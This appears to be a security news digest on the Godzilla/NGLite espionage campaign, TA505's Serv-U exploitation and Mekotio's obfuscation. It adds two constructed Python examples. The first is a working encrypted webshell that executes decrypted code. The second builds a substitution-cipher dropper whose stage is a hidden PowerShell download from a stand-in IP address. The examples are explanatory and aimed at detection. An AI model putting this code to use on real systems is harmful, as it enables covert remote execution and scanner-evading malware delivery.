At a glance.
- Espionage campaign exploits ManageEngine ADSelfService Plus vulnerability.
- TA505 exploits SolarWinds Serv-U flaw to deploy ransomware.
- Mekotio banking Trojan uses new infection technique.
Espionage campaign exploits ManageEngine ADSelfService Plus vulnerability.
Researchers at Palo Alto Networks' Unit 42 describe a cyberespionage campaign that's exploiting a vulnerability in Zoho's ManageEngine ADSelfService Plus, a self-service password management and single sign-on (SSO) product. The US Cybersecurity and Infrastructure Security Agency (CISA) issued an alert concerning this vulnerability, CVE-2021-40539, in September 2021. CISA describes the flaw as "an authentication bypass vulnerability affecting representational state transfer (REST) application programming interface (API) URLs that could enable remote code execution."
Unit 42 says that between September 22nd and early October "the actor successfully compromised at least nine global entities across the technology, defense, healthcare, energy, and education industries." The researchers haven't yet attributed the campaign to a particular threat actor, but they note similarities to previous campaigns by the Chinese group APT27 (also tracked as Emissary Panda). The threat actor is deploying the Godzilla webshell and the NGLite backdoor (both publicly available), as well as a new credential stealer Unit 42 calls "KdcSponge":
"Following initial exploitation, a payload was uploaded to the victim network which installed a Godzilla webshell. This activity was consistent across all victims; however, we also observed a smaller subset of compromised organizations who subsequently received a modified version of a new backdoor called NGLite. The threat actors then used either the webshell or the NGLite payload to run commands and move laterally to other systems on the network, while they exfiltrated files of interest simply by downloading them from the web server. Once the actors pivoted to a domain controller, they installed a new credential-stealing tool that we track as KdcSponge.
"Both Godzilla and NGLite were developed with Chinese instructions and are publicly available for download on GitHub. We believe threat actors deployed these tools in combination as a form of redundancy to maintain access to high-interest networks. Godzilla is a functionality-rich webshell that parses inbound HTTP POST requests, decrypts the data with a secret key, executes decrypted content to carry out additional functionality and returns the result via a HTTP response. This allows attackers to keep code likely to be flagged as malicious off the target system until they are ready to dynamically execute it."
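The request flow Unit 42 describes (POST in, decrypt with a shared secret, execute, encrypted result out) is the reason a file-signature scan of the webshell finds nothing: the commands only exist on the server while they run. The model below is an added example written for this page, not Godzilla's code or Unit 42's tooling. It stands in a hash-derived keystream with an HMAC for the shell's real cipher, uses a Python snippet as the "command" and treats a body that fails to authenticate as traffic to ignore, which is an assumption about how such shells stay quiet, not a documented Godzilla behaviour. The secret, nonce layout and function names are all constructed.

```python
"""Model of a key-gated webshell exchange (constructed; not Godzilla's actual protocol)."""
import contextlib
import hashlib
import hmac
import io
import os

NONCE_LEN = 16
TAG_LEN = 32


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Hash-derived keystream; a stand-in for whatever cipher a real shell uses."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def _xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, _keystream(key, nonce, len(data))))


def _tag(key: bytes, nonce: bytes, ct: bytes) -> bytes:
    return hmac.new(key, nonce + ct, hashlib.sha256).digest()


def _seal(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    ct = _xor(key, nonce, plaintext)
    return nonce + ct + _tag(key, nonce, ct)


def _open(key: bytes, body: bytes):
    """Return the plaintext, or None when the body is too short or the tag does not verify."""
    if len(body) < NONCE_LEN + TAG_LEN:
        return None
    nonce, ct, tag = body[:NONCE_LEN], body[NONCE_LEN:-TAG_LEN], body[-TAG_LEN:]
    if not hmac.compare_digest(tag, _tag(key, nonce, ct)):
        return None
    return _xor(key, nonce, ct)


def build_request(key: bytes, code: str, nonce: bytes = b"") -> bytes:
    """Operator side: the code travels encrypted and is never written to the target's disk."""
    nonce = nonce or os.urandom(NONCE_LEN)
    return _seal(key, nonce, code.encode())


def handle_post(key: bytes, body: bytes) -> bytes:
    """Shell side: authenticate, decrypt, execute, and return the encrypted output.

    A body that does not verify gets an empty reply (assumption for this model), so a
    scanner probing the endpoint without the secret sees nothing to act on.
    """
    plaintext = _open(key, body)
    if plaintext is None:
        return b""
    buf = io.StringIO()
    with contextlib.redirect_stdout(buf):
        exec(plaintext.decode(), {})  # the point at which arbitrary commands run
    return _seal(key, body[:NONCE_LEN], buf.getvalue().encode())


def read_response(key: bytes, body: bytes):
    """Operator side: decrypt the shell's reply; None if it is empty or does not verify."""
    plaintext = _open(key, body)
    return None if plaintext is None else plaintext.decode()


def operator_run(key: bytes, code: str):
    """One round trip: operator -> shell -> operator, in-process instead of over HTTP."""
    return read_response(key, handle_post(key, build_request(key, code)))


if __name__ == "__main__":
    secret = b"shared-secret"  # constructed
    print(repr(operator_run(secret, "print(sum(range(10)))")))
    print(repr(handle_post(b"wrong-key", build_request(secret, "print('x')"))))
```

The second call in the demo is the defender's problem in miniature: a probe without the secret produces an empty response and leaves nothing in the file on disk to match, so detection has to come from the traffic pattern (POST-only endpoints with opaque bodies) or from what the process does after `exec`, not from the shell's source.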
TA505 exploits SolarWinds Serv-U vulnerability to deploy ransomware.
NCC Group researchers are tracking an uptick in Clop ransomware attacks leveraging a remote code execution vulnerability in SolarWinds Serv-U (CVE-2021-35211). Microsoft reported the vulnerability to SolarWinds, which patched it in July 2021. NCC Group attributes these attacks to the cybercriminal actor TA505, noting, "We believe exploiting such vulnerabilities is a recent initial access technique for TA505, deviating from the actor’s usual phishing-based approach."
NCC Group advises users to update systems running SolarWinds Serv-U to the most recent version. The researchers note that, as of October, 66.5% (2,784) of the Serv-U instances they observed around the world remained vulnerable.
Mekotio banking Trojan uses new infection technique.
Check Point has observed Mekotio, a banking Trojan that targets Latin America, using a new infection flow. The researchers explain, "In the last 3 months, we saw approximately 100 attacks use new, simple obfuscation techniques, with the help of a substitution cipher, to hide the first module of the attack. This simple obfuscation technique allows it to go undetected by most of the AntiVirus products."
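A substitution cipher defeats string signatures because every byte of the first-stage script is remapped while the dropper still carries everything needed to undo the mapping. The example below is added for this page and is not Mekotio's scheme or Check Point's analysis: the dropper layout (a batch file whose `set T=` line holds the shuffled alphabet and whose `set P=` line holds the encoded stage), the seed, the stage-one command line and the signature strings are all constructed. It shows the obfuscation side, the static scan missing the stage, and the analyst-side recovery that pulls the table out of the dropper and inverts it.

```python
"""Substitution-cipher obfuscation of a first-stage script and its recovery (constructed)."""
import random
import string

# Characters the cipher covers; anything else passes through unchanged.
ALPHABET = string.ascii_letters + string.digits + " .,:/\\-_=$()\"'"

# Constructed stage-one command line; 198.51.100.7 is a documentation address.
STAGE = ("powershell -w hidden -c \"(New-Object Net.WebClient)"
         ".DownloadFile('http://198.51.100.7/m.zip','m.zip')\"")

# Constructed strings a naive scanner might look for.
SIGNATURES = ("powershell", "DownloadFile", "Invoke-Expression")


def make_table(seed: int) -> dict:
    """Seeded shuffle of ALPHABET standing in for a real dropper's mapping."""
    shuffled = list(ALPHABET)
    random.Random(seed).shuffle(shuffled)
    return dict(zip(ALPHABET, shuffled))


def substitute(text: str, table: dict) -> str:
    return "".join(table.get(ch, ch) for ch in text)


def invert(table: dict) -> dict:
    return {v: k for k, v in table.items()}


def build_dropper(stage: str, seed: int) -> str:
    """Dropper side: the table travels with the payload so a stub can decode it at run time."""
    table = make_table(seed)
    return "\n".join([
        "@echo off",
        "set T=" + "".join(table[c] for c in ALPHABET),
        "set P=" + substitute(stage, table),
    ])


def recover_stage(dropper: str) -> str:
    """Analyst side: extract the table and payload from the dropper and undo the substitution."""
    fields = dict(line.split("=", 1) for line in dropper.splitlines() if "=" in line)
    table = dict(zip(ALPHABET, fields["set T"]))
    return substitute(fields["set P"], invert(table))


def signature_hits(text: str) -> list:
    """Case-insensitive string match, the check the obfuscation is built to evade."""
    lowered = text.lower()
    return [s for s in SIGNATURES if s.lower() in lowered]


if __name__ == "__main__":
    dropper = build_dropper(STAGE, seed=7)
    print("hits on dropper:", signature_hits(dropper))
    print("hits after recovery:", signature_hits(recover_stage(dropper)))
```

The recovery works only because the mapping ships inside the dropper; a sample that fetches its table from a server instead would need the same decoding applied to the downloaded table, and a scanner that wants to catch this statically has to emulate the decode rather than match strings.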
Check Point notes that some of the malware's distributors were arrested in Spain in July 2021, but the primary gang appears to be operating from Brazil:
"The new campaign started right after the Spanish Civil Guard announced the arrest of 16 people involved with Mekotio distribution in July 2021. It appears that the gang behind the malware were able to narrow the gap quickly and change tactics to avoid detection. We assume that the main cybercrime groups are operating from Brazil and they collaborated with Spanish gangs to distribute malware. The arrest stopped the activity of the Spanish gangs but not the main cybercrime groups."